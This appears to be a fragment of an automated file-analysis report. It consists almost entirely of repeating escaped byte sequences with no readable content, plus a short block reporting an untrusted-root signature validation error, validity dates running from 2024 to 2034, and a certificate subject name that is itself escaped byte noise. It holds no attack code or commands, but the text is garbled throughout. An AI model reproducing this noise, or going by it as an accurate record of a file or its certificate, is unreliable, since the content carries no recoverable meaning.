0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe7\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 20/03/2024 11:11:46 21/03/2034 11:11:46
                                                Subject Chain
                                                • CN=\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe7\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6